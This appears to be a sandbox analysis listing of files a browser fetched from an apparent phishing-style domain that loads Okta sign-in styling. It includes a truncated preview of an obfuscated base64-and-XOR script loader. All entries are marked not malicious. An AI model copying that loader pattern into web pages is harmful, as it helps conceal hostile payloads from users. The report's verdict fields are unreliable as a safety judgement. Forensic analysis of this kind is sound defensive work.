                                                SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/klMFAP1hZyWVFU8sy5dnzOIVhSPHvbcdstfAz2fSvF7Le638snroQO78170
                                                Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (5162), with no line terminators
                                                Category:downloaded
                                                Size (bytes):5162
                                                Entropy (8bit):5.3533581296433415
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6776548F23C2A44FBD3C7343F0CB43E1
                                                SHA1:1E6871D4196BB00F0D161D5DC8872A8D940CEC30
                                                SHA-256:DDFC74A717ADCA6E6DB1BCF58D64FF7205F52BA4B61617A0137045088622C86E
                                                SHA-512:947B3AC76BC7B6DF6FD1C4AEA94E79D1E168E3B15BB4DC2A497E3DAFF60DAA58A490C89BA11A10910BB4B21C79A56CEAEDFFAE32A77D39E245422BE874BF7CF1
                                                Malicious:false
                                                Reputation:unknown
                                                URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.V6FjAvJg77U.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTsrDGQveiSaIRD3WTeyZtRVmuBWPg"
                                                Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_F .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_F .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_F .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                Category:downloaded
                                                Size (bytes):93276
                                                Entropy (8bit):7.997636438159837
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/efkZDxcEhGXP80Bdcx2D4jTp34L8aFjI5PajJ2mn93
                                                Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (51734)
                                                Category:downloaded
                                                Size (bytes):222931
                                                Entropy (8bit):5.0213311632628725
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0329C939FCA7C78756B94FBCD95E322B
                                                SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):128
                                                Entropy (8bit):4.750616928608237
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D90F02F133E7B82AF89B3E58526AC459
                                                SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnbKAHrmj0T_BIFDV9X_g0SBQ0TmyRjEkEJ7k7BKc1Y82YSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65531)
                                                Category:downloaded
                                                Size (bytes):134404
                                                Entropy (8bit):5.438939723875132
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:979848F7193937CCE54EB74C02BAF84B
                                                SHA1:C310F236316FCD097A7F9D3C3DBCD2CFAE54BFC9
                                                SHA-256:15A8C7F0148A9F3A6C01752F9E8561164456533F19A8280F369958B2D1B523A0
                                                SHA-512:7BD3551B51036CB8C9DB971226B2EF2CC27CF85A7E450C4052E21CD4D553FE8A0A733209ED51434518F803FE3A01A2D3035A5723346CBAF3A65876088DC8B7D6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):231
                                                Entropy (8bit):6.725074433303473
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:547988BAC5584B4608466D761E16F370
                                                SHA1:C11BB71049702528402A31027F200184910A7E23
                                                SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):49602
                                                Entropy (8bit):7.881935507115631
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DB783743CD246FF4D77F4A3694285989
                                                SHA1:B9466716904457641B7831868B47162D8D378D41
                                                SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/ij8ZJ17zkNSe3NeewLSkpYJgcfkViBa9uebyWlImnM8OEjVeWoTxfLkzQUNX1ef210
                                                Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 35 x 2, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):4.002585360278503
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:485327AB03E0D03C42B456293DB89A3D
                                                SHA1:7896C99C055860C8E190CB7BC27088F16A4EAB53
                                                SHA-256:CB5B3AE215B4A5547C31EC0770E3756A11569B87F2C939FA0B96F1C96ED9AFB6
                                                SHA-512:527FE1040A230DB3400F5E9D1358204A5840896BD0ED7220326453C5892E712703624567D26A4E3F7E7793166A45BB730DA03B7A082D1EDF6E3EDA12C6C51729
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...#.........]K.....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (10017)
                                                Category:downloaded
                                                Size (bytes):10245
                                                Entropy (8bit):5.437589264532084
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240913%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240913T194147Z&X-Amz-Expires=300&X-Amz-Signature=19f80cc5ce6419ef230d023ec34c8b36a0ad004993e4599f3d68a98680ea0ea0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:unknown
                                                URL:http://keyconserv.com/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                Category:downloaded
                                                Size (bytes):36696
                                                Entropy (8bit):7.988666025644622
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/459MZSLBE1uBqQwz90EQrQyLZxy67
                                                Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 50 x 28, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):1208
                                                Entropy (8bit):7.30420782084698
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:48E01CDA07220977658A21C9279180DB
                                                SHA1:A97F0FB5F8ECE79D615B723E3F38CA8DE8BC1FD1
                                                SHA-256:1BE91490E3DD6C47BE2349791BAF3B92DA41B6A23D81A0C160E75CEE18D23E51
                                                SHA-512:896D76F54A10F38E513EB8BB42B0B7C45578D66A53E50FA81A54D9C84BB6FEA81F8E1B7D9D5150E8C5AF7CC71F6937E476CA8E52868987CB329D84C19637ED6E
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/klt0gL5gK2cmpN4LsnFcyfwlpA811tSccwbSup0iuzFdMZItHmwYEIzZM1nooLxqqyc9qXEhowUXJ1rhen5lhTj0LwGCQG50v3t9p6pRYfvrtg4s3uROgB6lyz660
                                                Preview:.PNG........IHDR...2...........{.....pHYs...6...6....z....tEXtTitle.PDF CreatorA^.(....tEXtAuthor.PDF Tools AG..w0...-zTXtDescription.....())...///.+HI.-...).K....n...,.....IDAT....1.....1D....2...V......tn........x.}A...F.u........@.......l..g..b.{.m..U.P...d..l......?...mk...FK...]o...6...6...?.m..M}..}..~..~..f`..=..l....6.0...d.a...#.o...m.f.l..Y,V..6........`.p.*.m{...<....e....6l.6.... ....m.~..q..3.<,......1m.6l.....m.6l.m..6..t.0.m.v.<{.p...\..l.........a.6l........$........F.y..`.6.........&.d.._....q....R...F.....T..t.J.&..P.......{......K.........7.]m.*|I5..7.u6.6...0...q...j.*pD.)p.>.\}..x.3.l..................Ks..6..PLe.....0...*.7..FK......\...C.B.W.....a6.....j...`O..@..z..U.>..X@....cl..._.C.."..@.....T.... .....m.e..FUt.K.j..8..{;p.?.m.A-..j........6.....*..*X...*@...`.........m...@U....|B..bx..5.t@.....&5.6.yx..P.D...........tx..V...4.<p.[.6.[..6....T.............t....x...y...m+y.......e.R.5...............:..?T.V.Qa[......V
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2185), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):2552
                                                Entropy (8bit):5.945738459181609
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:05AD1CC53BFE062C4845120EB4BA5D40
                                                SHA1:A75C0C807DCA14892B77E3D3099276C85C45A866
                                                SHA-256:81BFD03A88951B38E476ED004515BB8EEAAB2A8765AF861A42AA3072FF3C7C94
                                                SHA-512:F5150C7B51535D16F4265C3D8BA96F10C47B5CAB40F3FD5652748EB68E4A0DC691542335053A764A14310E6D74013194998D2E4FF6EF9022D12C1C27BBE24F68
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/Q4NEaD7/
                                                Preview:<script>..function nThTGIFBlC(xqiidehMqR, GzPKdXFtoS) {..let FswdNdCsah = '';..xqiidehMqR = atob(xqiidehMqR);..let IFGOdxgGIC = GzPKdXFtoS.length;..for (let i = 0; i < xqiidehMqR.length; i++) {.. FswdNdCsah += String.fromCharCode(xqiidehMqR.charCodeAt(i) ^ GzPKdXFtoS.charCodeAt(i % IFGOdxgGIC));..}..return FswdNdCsah;..}..var Ejphifwawr = nThTGIFBlC(`XGleMhQGLwlEWFxpFCAFVCsjdQU7DSo3GCJmRBAROA0GLgBaKhZTByUKDS9ZHCcKWEgiFgAyAwZuSBldXGkLJ1dcKyN1BTsNKjcYIm9ZS2tbDjgEFB4oMUYJB0NfYRouAxpaCBkVDRdZBzYVWRJ5REFmXlo2FkBOeFhvSwp5TBBWRnlCDxsyFywXeBA+NUthDHlMWRBGcQANLwQAZgxCCgECECAaB2ZEEAg0FEIUJTgVHFEUMgsyIAUVKwoYETgNBi4AWioWUwclCg0vWQcjGEIFOUpZTH1UZlkQDzdDSjYeGiIWR0g9DAEgAx0pFx4OIwYEbx4aJRVFAjQQSmZSRnVeGU9xGG9LV1RmWRBGcUMPGzIXLBd4ED41QnxXAy8XVAkmTQ4uFBUyEF8IfwsQJBFaNQlcDyVLRWRFR2FQHhY+E0poTHlMWRBGcR5vSwp5THQ6ACQNATUeGyhZeyA4NTgMFjYkGxg/KAwLNjUkJRR+T3EYb0tXVGZZRBQoQxlMfVRmWRBGcUNCMxIAMwteRjMXDSBfFTIWUk4IGg0oADYWGl0oeEpCfEpUHwBfDyYhMiIaOn10OkZxQ0I8VxcnDVMOcUsHMwVdZgI9bHFDQmFXVGZZQgMlFhAvVxInFUMDam5o
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):29796
                                                Entropy (8bit):7.980058333789969
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:210433A8774859368F3A7B86D125A2A7
                                                SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):2905
                                                Entropy (8bit):3.962263100945339
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:FE87496CC7A44412F7893A72099C120A
                                                SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://klsi.ieviatind.com/yzYpFQtsl4GObIK3IsjAjh9opMIVkhmZwqotvE5TjVN90173
